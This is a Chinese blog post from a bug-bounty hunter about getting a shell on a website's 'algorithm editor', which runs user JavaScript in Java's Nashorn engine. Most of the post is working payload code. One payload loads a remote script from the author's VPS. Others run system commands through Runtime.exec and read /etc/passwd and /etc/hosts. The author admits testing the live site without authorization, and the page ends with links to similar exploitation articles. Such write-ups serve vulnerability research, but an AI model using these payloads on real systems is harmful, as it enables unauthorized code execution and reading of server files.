SRC挖掘技巧—写js代码就能getshell

已于 2022-10-24 13:37:50 修改
阅读量1.6k 收藏 2
点赞数 2
分类专栏: Web安全 文章标签: javascript 网络安全 java 1024程序员节
于 2022-10-16 11:51:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyth0zn/article/details/127345749
版权

声明 

   免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

在做功能测试时,关注到一个功能点,看到“算法编辑”感觉很厉害的样子

打开后看看,可以写代码。执行了下,就提示了个这个

查看格式化按钮旁边的【查看帮助接口】 看到里面写的特别像js 代码

结合前期对网站分析。发现后端用的node js,尝试写一个nodejs 代码执行

var process = require('child_process');
var cmd = 'ifconfig';
process.exec(cmd, function(error, stdout, stderr) {
    console.log("error:"+error);
    console.log("stdout:"+stdout);
    console.log("stderr:"+stderr);
});

通过上面报错发现用了java的框架 来执行js 查一下api 教程 ,参考如下资料

介绍 Nashorn —— Java 8 JavaScript 引擎 | 耗子的博客

可以通过load 载入远程脚本

用以下样例脚本测试下。随便打印当前文件路径

var imports = new JavaImporter(java.io, java.lang);
with (imports) {
    var file = new File(__FILE__);
    load('http://106.xxxx5:8989/underscore-min.js');
    print(file.getAbsolutePath());
    // /path/to/my/script.js
}

发现vps 收到请求 ,客户端是java 1.8.0_212

 

服务器的路径也显示出来了

继续看资料 发现 通过 框架可以通过js创建java 对象 使用关键字 Java.type 就可以

于是在本地 导入这个库 模拟下环境。再来写一个 java代码执行的 试试

public static String runCmd(String command) {
    StringBuilder sb =new StringBuilder();
    try {
        Process process=Runtime.getRuntime().exec("cmd /C " + command);
        InputStream inputStream = process.getInputStream();
        InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
        BufferedReader bufferedReader=new BufferedReader(inputStreamReader);
        String line;
        while((line=bufferedReader.readLine())!=null)
        {
            sb.append(line+"\n");
        }
    } catch (Exception e) {
        return null;
    }
    return sb.toString();
    }

当然格式要按照js的方法写

发现成功执行

赶紧拿到web上去测试下。

激动的心情。发现vps成功收到来自web的请求 而且是root权限

请求dnslog

最后改成直接把结果回显到页面上。这样下面得执行日志可以显示执行结果。前面都是无回显得

pwd && ifconfig && cat /etc/passwd

发现还存在内网。因为没有授权。所以点到为止 代码如下

var Runtime = Java.type('java.lang.Runtime');
var InputStreamReader = Java.type('java.io.InputStreamReader');
var BufferedReader = Java.type('java.io.BufferedReader');
var CmdArray = Java.type("java.lang.String[]");
var array = new CmdArray(3);
array[0] = "/bin/bash";
array[1] = "-c";
array[2] = "pwd && ifconfig && cat /etc/hosts";
var process = Runtime.getRuntime().exec(array);
var out = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = out.readLine()) != null) {
  print(line);
}

总结 :

发现算法编辑器->尝试执行nodejs 代码执行->发现调用得是java Nashorn引擎->写js代码调用java 方法执行代码->over!

pyth0nn
关注
专栏目录
SRC漏洞挖掘之信息收集
悦分享
07-08 1312
SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能到别人不到的洞。项目已整理Gitbook文档,方便阅览:Information Collection Handbook由此项目整理的SRC资产信息收集聚合网站:lovebear.top/info -- SRC信息收集导航知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。Whois 查询Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细
SRC挖掘思路及方法
m0_65606241的博客
05-11 1万+
最近发现很多刚接触渗透方面的小伙伴都不知道实战挖掘漏洞的诀窍,于是我打算一些自己漏洞的诀窍。
js到getshell
weixin_50464560的博客
07-22 580
看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬的干干净净了。没有内网VPN基本上不到,然后我就去公众号看了一下,找到了一个系统 首先来点团队特色F12大法,查看html源码发现一处js 发现登录后直接跳转这个地址 直接访问看看有没有未授权漏洞http://xx.xx.xx.xx/index.jsp 访问了好吧,是首页。。打扰了但是我不甘心,我再用F12大法,发现了index.js 访问http://xx.xx.xx.xx/index.
SRC漏洞挖掘思路手法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
logic1001的博客
10-06 994
这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘的思路技巧。很多人可能都过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己那种大厂的漏洞都不倒,上一两个小时或者半个小时就不了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘和别的站点漏洞挖掘都大差不大,但是为什么都感觉自己
html页面srcjs表达式,JavaScript学习笔记
weixin_29597551的博客
06-04 842
JavaScript-html搭建网页的结构和内容-css用于美化页面-JavaScript 给页面添加动态效果和内容的JS特点-js属于脚本语言,不需要编译,由浏览器解析执行。-js可以嵌入到html代码中。-js基于面向对象,属于弱型语言。JS优点-交互性:可以直接和用户进行交互-安全性:js语言只能访问浏览器内部的数据,不能访问浏览器外部的内容(电脑磁盘中的各种数据)如何引入JS代码1、在元...
重生之我是赏金猎人(三)-无脑挖掘SRC getshell
weixin_44948325的博客
03-26 3193
0x00 项目背景 该系列旨在分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸。 该系列首发github:https://github.com/J0o1ey/BountyHunterInChina 本项目由M78sec维护,未经授权,文章严禁私自修改版权转载。 0x01 前⾔ 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 0x02 资产收集到脆弱系统 在某src挖掘过程中,本⼈通过ssl证书对域名资产进⾏了收集,通
挖掘src之路
04-24
网络漏洞挖掘 挖掘src之路
红队系列-SRC常用漏洞挖掘技巧
aming小老弟
12-08 1513
安全弱点sql 注入命令 注入深入利用xpath注入 (老式 ) 广泛了解乌云镜像薅羊毛。
海纳企业网站管理系统HituxCms2.1代码审计GETSHELL+注入
weixin_33883178的博客
11-09 1641
〇.前言 本文为笃行日常工作记录,这篇审计文章,也是在2014年国庆期间的,比较简单。意在展现一个完整的开源CMS代码手工审计的过程,从未发表过,三年过去了,回过头看还是优点意义的,故这次发出来,一起学习~。通过本文你可以获取HituxCMS 2.1版本的漏洞发掘过程,getshell和sql注入。 一.系统介绍 海纳企业网站管理系统(...
实战 -- 记一次src小组定向挖掘
qq_29437513的博客
01-03 2136
实战 - 记一次src小组定向挖掘
网络安全 | PHP代码审计】YXcms
等风来
09-19 989
由于所有后台页面都继承了这个类,因此所有后台页面都会执行这个构造函数,导致全站沦陷。管理员未登录的情况下,访问钓鱼链接,也能实现后续的账户接管。
国内SRC漏洞挖掘技巧与经验分享
02-01
国内SRC漏洞挖掘技巧与经验分享 包括:信息收集、字典生成、业务安全、APP测试等内容
SRC挖掘PPT.zip
07-19
src技巧分享,src可以参考,包含《PSRC小目标,挣他一个亿.pdf》《SRC混子是怎样练成的.pdf》《国内SRC漏洞挖掘的一些思路分享.pdf》
绝对干货!src漏洞挖掘经验分享
热门推荐
南迪叶先森
07-16 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! src漏洞挖掘经验分享 – 掌控安全以恒 一、公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。.
实战|全程分析js到getshell
qq_50854662的博客
09-28 281
本篇转载于https://forum.butian.net/share/260 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬的干干净净了。没有内网VPN基本上不到,然后我就去公众号看了一下,找到... 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusr
plus/mytag_js.php?aid=9090,DeDeCMS(织梦)变量覆盖0day getshell
weixin_35690449的博客
03-23 667
#!usr/bin/php -w<?phperror_reporting(E_ERROR);set_time_limit(0);print_r(´DEDEcms Variable CoverageExploit Author: www.heixiaozi.com www.webvul.com);echo "\r\n";if($argv[2]==null){print_r(´+--------...
一次src挖掘经历
sun_k的博客
01-19 932
一、详细说明: 在喜马拉雅客服沟通处存在反射型xss漏洞,可以获取cookie信息以及IP地址 二、漏洞证明: 1.输入payload:<img src=a οnerrοr=console.log(“xss”) 可以发现在console中执行 2.与人工客服沟通输入xss平台payload成功获取cookie等信息 三、修复方案: 修复建议对用户的输入进行实体转义或标签黑白名单处理 四、喜马拉雅官方回复为内部已知漏洞 ...
node.js + postgres 从注入到Getshell
weixin_34313182的博客
11-07 220
【转】http://bobao.360.cn/learning/detail/4657.html 前言(最近你们可能会看到我发很多陈年漏洞的分析,其实这些漏洞刚出来我就想,不过是没时间,拖延拖延,但该做的事迟早要做的,共勉)Postgres是现在用的比较多的数据库,包括我自己的博客,数据库都选择使用Postgres,其优点我就不展开说了。node-postgres是node...
JS中的SRC
weixin_30908103的博客
05-30 1046
当应用SRC属性时,首先需要创建一个JS文件。为什么不在此文件中使用<script>标记?您可以直接使用输出语句吗?我会分享我的报告一个答案JS文件不是HTM文件,因此内部不能有HTML标记(Output语句中包含的HTML标记除外)。即使可以在JS文件中使用<script>标记,因为JS文件本身是由<script src=“…”>标记调用的,这将成为重复标记,...
Seacms代码审计:getshell漏洞深度解析
在本文档中,作者分享了对Seacms框架的代码审计小结,重点关注了文件入和文件包含两个方面的潜在安全问题。Seacms框架中存在一些未经过滤的文件操作,可能导致代码注入漏洞。 首先,作者提到框架中广泛使用了`...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值